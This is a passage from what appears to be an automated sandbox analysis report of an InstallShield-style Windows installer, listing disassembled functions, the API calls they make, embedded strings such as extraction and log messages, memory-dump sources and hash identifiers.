                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Heap$File$Process$AllocCreateFreeH_prolog3_ReadSize_strlen
                                                                                                                                                                          • String ID: $$jG$,jG$@jG$DjG$HjG$LjG
                                                                                                                                                                          • API String ID: 3764712436-1056898129
                                                                                                                                                                          • Opcode ID: 4df3d7d2938c552961260c112e0393b70111c7dea538a428ad612469a7b22709
                                                                                                                                                                          • Instruction ID: dd704395b173d11368913ea49a614eed6fc5eaefedf0abae67e1876da9bfd6e4
                                                                                                                                                                          • Opcode Fuzzy Hash: 4df3d7d2938c552961260c112e0393b70111c7dea538a428ad612469a7b22709
                                                                                                                                                                          • Instruction Fuzzy Hash: 29F14871D01258EEDB20EBA9CC95BDEBBB8AF15304F5441AEE009B7281DB741E88CF55
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00434C67, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 220COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00434C71
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00434CDA
                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00434CE1
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                          • SetCursor.USER32(?,00000000,?,?,?,?,00000001), ref: 00434F1C
                                                                                                                                                                            • Part of subcall function 0043FBF3: __EH_prolog3_GS.LIBCMT ref: 0043FBFD
                                                                                                                                                                            • Part of subcall function 0043FBF3: wsprintfW.USER32 ref: 0043FC3F
                                                                                                                                                                            • Part of subcall function 0043FBF3: wvsprintfW.USER32(?,?,00000000), ref: 0043FC5A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$Cursor$FreeH_prolog3_String$H_prolog3Loadwsprintfwvsprintf
                                                                                                                                                                          • String ID: Extracting '%s' to %s$Extraction of '%s' failed$HsG$session.cpp
                                                                                                                                                                          • API String ID: 1700565195-3068836811
                                                                                                                                                                          • Opcode ID: 8b3d99bb21f297aa49e65c99c1b5ee2325f7c2a040c2f69d32f87a9ec5dcb687
                                                                                                                                                                          • Instruction ID: 47b130e81680a4017e4b0987a9390e1bff45684eaba4973046eabc3720118841
                                                                                                                                                                          • Opcode Fuzzy Hash: 8b3d99bb21f297aa49e65c99c1b5ee2325f7c2a040c2f69d32f87a9ec5dcb687
                                                                                                                                                                          • Instruction Fuzzy Hash: 53919071900118EEDB14DBA0CC95BDDB7B4AF55304F1040AEE445B7191DBB86F88CFA9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004573CD, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 219fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,_is,00000000,00000000,?,00000104), ref: 00457538
                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,00000000,?,00000104), ref: 0045741A
                                                                                                                                                                            • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
                                                                                                                                                                            • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
                                                                                                                                                                            • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004573D7
                                                                                                                                                                            • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
                                                                                                                                                                            • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
                                                                                                                                                                            • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 0045755D
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 00457F57: __EH_prolog3.LIBCMT ref: 00457F5E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3$FileH_prolog3_StringTemp$AllocDeleteNamePath
                                                                                                                                                                          • String ID: .tmp$HsG$HsG$_is
                                                                                                                                                                          • API String ID: 2274788794-1593491402
                                                                                                                                                                          • Opcode ID: c9fd242f252b6cf137be54d671611a44bb813da2993506407275415ebe84e19d
                                                                                                                                                                          • Instruction ID: 43605242a3203fda11d6f8f6a33ea75ff43537e88c4c263b2126fa632526608b
                                                                                                                                                                          • Opcode Fuzzy Hash: c9fd242f252b6cf137be54d671611a44bb813da2993506407275415ebe84e19d
                                                                                                                                                                          • Instruction Fuzzy Hash: B0918F71900248EEDB15EBA0CC91BED7778AF14308F5040AEF949B71D2EB785B49CB69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045F900, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 187windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0045FC5E: __EH_prolog3.LIBCMT ref: 0045FC65
                                                                                                                                                                          • _memmove.LIBCMT ref: 0045FA6D
                                                                                                                                                                          • GetWindowDC.USER32(00000000), ref: 0045FA7D
                                                                                                                                                                          • CreateDIBitmap.GDI32(00000000,00000000,00000004,?,00000000,00000000), ref: 0045FA92
                                                                                                                                                                          • ReleaseDC.USER32 ref: 0045FAC3
                                                                                                                                                                          • _memset.LIBCMT ref: 0045FAF6
                                                                                                                                                                          • _memmove.LIBCMT ref: 0045FB03
                                                                                                                                                                          • _memmove.LIBCMT ref: 0045FB17
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memmove$BitmapCreateH_prolog3ReleaseWindow_memset
                                                                                                                                                                          • String ID: (
                                                                                                                                                                          • API String ID: 3696145347-3887548279
                                                                                                                                                                          • Opcode ID: 78d562634c56be6fa09653b691a3e4b71f1d15a1550c6d6960e09247489932ec
                                                                                                                                                                          • Instruction ID: 64c65e59abd32d0e133353bb240de868eba41b9102c135dbc8d23c24359be117
                                                                                                                                                                          • Opcode Fuzzy Hash: 78d562634c56be6fa09653b691a3e4b71f1d15a1550c6d6960e09247489932ec
                                                                                                                                                                          • Instruction Fuzzy Hash: 767148B1D002189FDB14DFA5C845B9EBBF5FF08304F10416AE819E7242EB35A948CF55
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00428C18, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 175COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00428C22
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 00436124: __EH_prolog3_GS.LIBCMT ref: 0043612B
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeH_prolog3_String
                                                                                                                                                                          • String ID: Install does not use script$Install is basic with InstallScript custom actions$Install is script driven (ISMSI)$Install is script driven MSI 4.5 style embedded UI (ISMSI)$ScriptDriven$Startup$msiaction.cpp
                                                                                                                                                                          • API String ID: 2608676048-4080540832
                                                                                                                                                                          • Opcode ID: 79626fb230385e693edcd1394918e74e4fca901fbe6e7cc03b76a01f67097525
                                                                                                                                                                          • Instruction ID: ad5a2d82dc55b4cbb194725caecb24b291642526057dbdae7947644be3e95696
                                                                                                                                                                          • Opcode Fuzzy Hash: 79626fb230385e693edcd1394918e74e4fca901fbe6e7cc03b76a01f67097525
                                                                                                                                                                          • Instruction Fuzzy Hash: 5571A030911258BEEB25E7A0CC55BEEB778AB14344F9401AFE145B30D1EBB85F88CB59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00421390, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$H_prolog3lstrcpywsprintf
                                                                                                                                                                          • String ID: %s /g %s /g %s$%s /g %s /g %s /s
                                                                                                                                                                          • API String ID: 103519269-3131057161
                                                                                                                                                                          • Opcode ID: f2068c7e854fe2b4e082c4e8ea8452d09a134226448cf486acab4fd453ceb7e4
                                                                                                                                                                          • Instruction ID: 6ae94a66c6c458ee2c63272d13abc270b7fd90245feae705321fb4a75bbb3428
                                                                                                                                                                          • Opcode Fuzzy Hash: f2068c7e854fe2b4e082c4e8ea8452d09a134226448cf486acab4fd453ceb7e4
                                                                                                                                                                          • Instruction Fuzzy Hash: D3518871E04258AFDB10EB64DC49FEB77B8EF15304F0045EBE409D72A1DB389A948B99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00435CD9, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 143COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00435CE3
                                                                                                                                                                          • _memset.LIBCMT ref: 00435D0F
                                                                                                                                                                            • Part of subcall function 004352C7: __EH_prolog3_catch.LIBCMT ref: 004352CE
                                                                                                                                                                            • Part of subcall function 004352C7: lstrcmpW.KERNEL32(00000008,00483E18,?,?,00483E18,00000008,?,00000004,004374EE,Startup,Source,00000001,?,00000400,00000452), ref: 004352F6
                                                                                                                                                                          • wsprintfW.USER32 ref: 00435D4B
                                                                                                                                                                          • CharNextW.USER32(?), ref: 00435D5E
                                                                                                                                                                          • CharNextW.USER32(00000000), ref: 00435D61
                                                                                                                                                                            • Part of subcall function 0040D2E5: __EH_prolog3_GS.LIBCMT ref: 0040D2EC
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CharErrorH_prolog3_LastNext$H_prolog3_catch_memsetlstrcmpwsprintf
                                                                                                                                                                          • String ID: %#x$Setup.bmp$Type
                                                                                                                                                                          • API String ID: 539155021-465780282
                                                                                                                                                                          • Opcode ID: 1f5c19871b582fbb153f4dc19c76c09b812bfce6f2edfc825eed891daff154a8
                                                                                                                                                                          • Instruction ID: 5f42342d2d58e6f73128415084b29b66e1ddaba165bc7198fc77a26a90c0ce41
                                                                                                                                                                          • Opcode Fuzzy Hash: 1f5c19871b582fbb153f4dc19c76c09b812bfce6f2edfc825eed891daff154a8
                                                                                                                                                                          • Instruction Fuzzy Hash: A241F9B1A00318ABDB20EB71CC86EEF777CEB4A714F00559BB509A6181DA785B44CB99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0043459C, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 117COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004345A6
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                            • Part of subcall function 00411F19: __EH_prolog3_GS.LIBCMT ref: 00411F20
                                                                                                                                                                            • Part of subcall function 0042BE20: __EH_prolog3.LIBCMT ref: 0042BE27
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeH_prolog3_String$H_prolog3
                                                                                                                                                                          • String ID: IS_MINOR_UPGRADE=1$ REINSTALL=ALL$ REINSTALLMODE=vomus$HsG$IS_MINOR_UPGRADE$REINSTALL$REINSTALLMODE
                                                                                                                                                                          • API String ID: 386487564-304950045
                                                                                                                                                                          • Opcode ID: 9f0419de6705dc92d5bee2f9822d2402fde68fc7769a1b14ae4832fe4cf2b4b0
                                                                                                                                                                          • Instruction ID: c40a303016965c9a25104b3401e9ed5b6c93e3c6928f1a74a01d11e4fa8d6b12
                                                                                                                                                                          • Opcode Fuzzy Hash: 9f0419de6705dc92d5bee2f9822d2402fde68fc7769a1b14ae4832fe4cf2b4b0
                                                                                                                                                                          • Instruction Fuzzy Hash: 6541B031900208AAEB14F6A1DC92BFE7378AB41718F64815FF015BB1D1DBBC2E45CB69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045DA40, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,0045DB99,?,00000000,?,00000001,HsG,004332D7,?,?,00000000,0000008C,00438BF4,?,00000003,00000000), ref: 0045DA70
                                                                                                                                                                          • wsprintfW.USER32 ref: 0045DAA4
                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 0045DAB8
                                                                                                                                                                          • ResetEvent.KERNEL32(?,00000002,?,0045DB99,?,00000000,?,00000001,HsG,004332D7,?,?,00000000,0000008C,00438BF4,?), ref: 0045DAC7
                                                                                                                                                                          • GetLastError.KERNEL32(?,0045DB99,?,00000000,?,00000001,HsG,004332D7,?,?,00000000,0000008C,00438BF4,?,00000003,00000000), ref: 0045DAD3
                                                                                                                                                                          • ResetEvent.KERNEL32(0000000E,00000002,?,0045DB99,?,00000000,?,00000001,HsG,004332D7,?,?,00000000,0000008C,00438BF4,?), ref: 0045DB2E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorEventLastReset$lstrcatwsprintf
                                                                                                                                                                          • String ID: Range: bytes=%d-$Range: bytes=%d-
                                                                                                                                                                          • API String ID: 2894917480-791809254
                                                                                                                                                                          • Opcode ID: ebd292b974d9b135799584cb63238d6066062b6ffa6f44b23d5b3eacd079b00f
                                                                                                                                                                          • Instruction ID: c0811adfebdd7188054b3ea2c0bc6590496823d125f2625714b7c46c8441b21e
                                                                                                                                                                          • Opcode Fuzzy Hash: ebd292b974d9b135799584cb63238d6066062b6ffa6f44b23d5b3eacd079b00f
                                                                                                                                                                          • Instruction Fuzzy Hash: DC415E71A04100EFDF259F54CC88A2B3BAAEF45702B1940AAFD058A267E735EC48DB19
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004404D4, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 97processCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004404DE
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                          • _memset.LIBCMT ref: 00440503
                                                                                                                                                                          • _memset.LIBCMT ref: 00440514
                                                                                                                                                                          • CreateProcessW.KERNEL32 ref: 0044059A
                                                                                                                                                                          • WaitForInputIdle.USER32 ref: 004405D5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast_memset$CreateH_prolog3_IdleInputProcessWait
                                                                                                                                                                          • String ID: Attempting to launch (no wait): %s$Launch result %d$utils.cpp
                                                                                                                                                                          • API String ID: 3383204261-2306871107
                                                                                                                                                                          • Opcode ID: 361aca7aa7c5668e817609f1717a6e6276b07806322b8bdf676a6293ed85faf9
                                                                                                                                                                          • Instruction ID: 6f277134bf7db7eae0150f77a1c6482df15a31cc856bd7231d0bd62bd813138e
                                                                                                                                                                          • Opcode Fuzzy Hash: 361aca7aa7c5668e817609f1717a6e6276b07806322b8bdf676a6293ed85faf9
                                                                                                                                                                          • Instruction Fuzzy Hash: B93150B1D10218AFDB04EFA5CD46AEEBBBCEF14344F14406EF106B7191EA745A05CB69
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004159CB, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 95stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
